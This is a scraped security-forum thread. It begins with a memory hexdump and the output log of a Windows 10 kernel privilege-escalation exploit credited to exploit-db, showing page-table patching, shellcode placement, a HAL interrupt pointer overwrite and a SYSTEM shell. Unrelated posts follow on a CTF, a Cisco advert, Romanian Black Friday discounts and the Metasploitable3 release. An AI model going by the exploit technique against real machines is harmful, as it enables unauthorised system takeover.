000000003D9EC010 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC020 | 67 68 81 08 01 00 90 01 00 00 00 00 00 00 00 00 | gh..............
000000003D9EC030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC090 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC110 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC120 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC130 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC140 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC150 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC160 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC170 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC180 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC190 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC1A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC1B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC1C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC1D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC1E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC1F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC200 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC210 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC220 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC230 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC240 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC250 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC260 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 
000000003D9EC270 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC280 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC290 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC2A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC2B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC2C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC2D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC2E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC2F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC300 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC310 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC320 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC330 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC340 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC350 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC360 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC370 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC380 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC390 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC3A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC3B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC3C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC3D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 
000000003D9EC3E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC3F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC400 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC410 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC420 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC430 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC440 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC450 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC460 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC470 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC480 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC490 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC4A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC4B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC4C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC4D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC4E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC4F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC500 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC510 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC520 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC530 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC540 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 
000000003D9EC550 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC560 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC570 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC580 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC590 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC5A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC5B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC5C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC5D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC5E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC5F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC600 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC610 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC620 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC630 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC640 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC650 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC660 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC670 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC680 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC690 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC6A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC6B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 
000000003D9EC6C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC6D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC6E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC6F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC700 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC710 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC720 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC730 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC740 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC750 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC760 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC770 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC780 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC790 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC7A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC7B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC7C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC7D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC7E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC7F0 | 00 00 00 00 00 00 00 00 67 08 b9 4d 00 00 60 02 | ........g..M..`. 000000003D9EC800 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC810 | 63 f8 ff 3f 01 00 00 00 63 38 88 00 00 00 00 80 | c..?....c8...... 000000003D9EC820 | 63 38 88 00 00 00 00 80 63 38 88 00 00 00 00 80 | c8......c8...... 
000000003D9EC830 | 63 38 88 00 00 00 00 80 63 d8 ff 3f 01 00 00 00 | c8......c..?.... 000000003D9EC840 | 63 b8 ff 3f 01 00 00 00 00 00 00 00 00 00 00 00 | c..?............ 000000003D9EC850 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC860 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC870 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC880 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC890 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC8A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC8B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC8C0 | 63 a8 3f 0f 01 00 00 00 00 00 00 00 00 00 00 00 | c.?............. 000000003D9EC8D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC8E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC8F0 | 00 00 00 00 00 00 00 00 63 18 35 02 00 00 00 00 | ........c.5..... 000000003D9EC900 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC910 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC920 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC930 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC940 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC950 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC960 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC970 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC980 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC990 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 
000000003D9EC9A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC9B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC9C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC9D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC9E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC9F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA10 | 00 00 00 00 00 00 00 00 63 d8 47 00 00 00 00 00 | ........c.G..... 000000003D9ECA20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECAA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECAB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECAC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECAD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECAE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECAF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 
000000003D9ECB10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB20 | 00 00 00 00 00 00 00 00 63 18 8b 00 00 00 00 00 | ........c....... 000000003D9ECB30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECBA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECBB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECBC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECBD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECBE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECBF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC20 | 63 78 82 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx.............. 000000003D9ECC30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC50 | 63 b8 57 00 00 00 00 00 00 00 00 00 00 00 00 00 | c.W............. 000000003D9ECC60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 
000000003D9ECC80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECCA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECCB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECCC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECCD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECCE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECCF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD90 | 63 08 a9 30 01 00 00 00 63 68 c2 2a 00 00 00 00 | c..0....ch.*.... 000000003D9ECDA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECDB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECDC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECDD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECDE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 
000000003D9ECDF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE60 | 63 78 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx.............. 000000003D9ECE70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECEA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECEB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECEC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECED0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECEE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECEF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 
000000003D9ECF60 | 67 18 21 00 01 00 00 80 00 00 00 00 00 00 00 00 | g.!............. 000000003D9ECF70 | 00 00 00 00 00 00 00 00 63 10 98 00 00 00 00 00 | ........c....... 000000003D9ECF80 | 63 40 98 00 00 00 00 00 00 00 00 00 00 00 00 00 | c@.............. 000000003D9ECF90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECFA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECFB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECFC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECFD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECFE0 | 63 d8 34 02 00 00 00 00 63 38 8c 00 00 00 00 00 | c.4.....c8...... 000000003D9ECFF0 | 00 00 00 00 00 00 00 00 63 f0 99 00 00 00 00 00 | ........c....... +] Selected spurious PML4E: fffff67b3d9ecf00 +] Spurious PT: fffff67b3d9e0000 +] Content pml4e fffff67b3d9ecff8: 99f063 +] Patching the Spurious Offset with 99f067 +] Content pdpte fffff67b3d9ffff8: 9a0063 +] Patching the Spurious Offset with 9a0067 +] Content pdpte fffff67b3ffffff0: 821063 +] Patching the Spurious Offset with 821067 +] Content pte fffff67fffffe800: 1967 +] Patching the Spurious Offset with 1967 Original HalpIntteruptRequest pointer: fffff80150e1fc40 +] Selected spurious PML4E: fffff67b3d9ecf08 +] Spurious PT: fffff67b3d9e1000 +] Content pml4e fffff67b3d9ecff8: 99f063 +] Patching the Spurious Offset with 99f067 +] Content pdpte fffff67b3d9ffff8: 9a0063 +] Patching the Spurious Offset with 9a0067 +] Content pdpte fffff67b3ffffff0: 821063 +] Patching the Spurious Offset with 821067 +] Content pte fffff67fffffe800: 1967 *** Patching the original location to enable NX... 
+] Patching the Spurious Offset with 1967 HAL address: fffff67b3d9e1000 +] w00t: Shellcode stored at: ffffffffffd00d50 +] Selected spurious PML4E: fffff67b3d9ecf10 +] Spurious PT: fffff67b3d9e2000 +] Content pml4e fffff67b3d9ecff8: 99f063 +] Patching the Spurious Offset with 99f067 +] Content pdpte fffff67b3d9ffff8: 9a0063 +] Patching the Spurious Offset with 9a0067 +] Content pdpte fffff67b3ffffff0: 821063 +] Patching the Spurious Offset with 821067 +] Content pte fffff67fffffe800: 1967 +] Patching the Spurious Offset with 1967 Patch HalpInterruptController->HalpApicRequestInterrupt: fffff67b3d9e26e8 with ffffffffffd00d50 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Users\qa\Desktop> C:\Users\qa\Desktop>whoami nt authority\system C:\Users\qa\Desktop> Sursa: https://www.exploit-db.com/exploits/40823/
-
I've cleaned things up. Who else can capture all 10 flags?
-
http://www.go4it.ro/clipuri-virale/sefii-cisco-trebuie-sa-vada-aceasta-reclama-hazlie-a-concurentei-15985655/
-
It's useful for SEO.
-
At first glance, emag is the most serious when it comes to discounts. Although they aren't what they are advertised as (700% or 4000 EURO), they are still discounts.
-
PS: Lots of fake discounts on evomag...
-
It has started at evomag. Edit: I've noticed fake discounts, but also some real ones.
-
Is it just me, or is PCGarage already barely working?
-
Fake or not, there is a chance that some products really are discounted. I found this:

Although Black Friday officially starts at 00:00, some shops have already sent their offers to some of the customers subscribed to their newsletter. In case you missed an offer, below we have compiled a list of all the available catalogues. The list will be updated in real time, so stay on this page. We will also mention which of these offers are really worth it. Updates will be placed at the bottom of the list and marked with [UPDATE].

evoMAG
This year, besides a car and 25000 other products, there will also be apartments! We will be back with a catalogue soon!

Emag
– Microsoft Xbox ONE, 500 GB, stock of 500 units at 599,99 lei.
– Star-Light 50DM5500 TV, Full HD, 127CM diagonal, stock of 1.000 units at 999,99 lei.
– Rowenta CF9220D0 brush, stock of 5.000 units at 99,99 lei.
– Orium 601 185/65 R15 88T winter tyre, stock of 3.000 units at 99,99 lei.
– Arctic ANK305+ fridge-freezer, stock of 1.000 units at 699,99 lei.
– Calvin Klein Euphoria perfume for women, stock of 5.000 units at 119,99 lei.
– Lenovo IdeaPad laptop with Intel Core i3 processor, 4GB RAM, 500GB HDD, stock of 1.000 units at 999,99 lei.
– Samsung GALAXY S6 Edge, 32GB memory, stock of 600 units at 1.699,99 lei.
– Tefal 24 cm non-stick frying pan, stock of 8.500 units at 19,99 lei.
– Vonino Xylo X phone, Dual SIM, 8GB, stock of 1.000 units at 99,99 lei.
– Kingston V300 SSD at 199,99 lei, stock of 850 units.

Rcs-Rds
Their offer can be found here: http://www.rcs-rds.ro/goldfriday

[UPDATE] Flanco
Flanco's offer can be found here: https://zonait.tv/galerie-catalog-flanco-de-black-friday-2016/

Link: https://zonait.tv/iata-ofertele-de-black-friday-2016-live/
-
Metasploitable3: An Intentionally Vulnerable Machine for Exploit Testing
Blog Post created by sinn3r on Nov 15, 2016

Test Your Might With The Shiny New Metasploitable3

Today I am excited to announce the debut of our shiny new toy - Metasploitable3. Metasploitable3 is a free virtual machine that allows you to simulate attacks largely using Metasploit. It has been used by people in the security industry for a variety of reasons: training for network exploitation, exploit development, software testing, technical job interviews, sales demonstrations, or CTF junkies who are looking for kicks, etc.

If you are already a Metasploitable fan, you would have noticed that we haven't had a new vulnerable image since 2012. To be honest, when James and I took over the project, we didn't even know who was maintaining it anymore. So we decided to do something about it. After months of planning and building the vulnerable image from scratch, we have something for you all to play with.

Unlike its predecessor, Metasploitable3 has these cool features:

It is Open Source

During development, we recognized one of the drawbacks of Metasploitable2 was maintenance. We figured since we want everyone in the community to play, the community should have the power to influence and contribute. This also allows the vulnerable image to constantly evolve, and hopefully will keep the VM fun to play. Metasploitable3 can be found as a Github repository here.

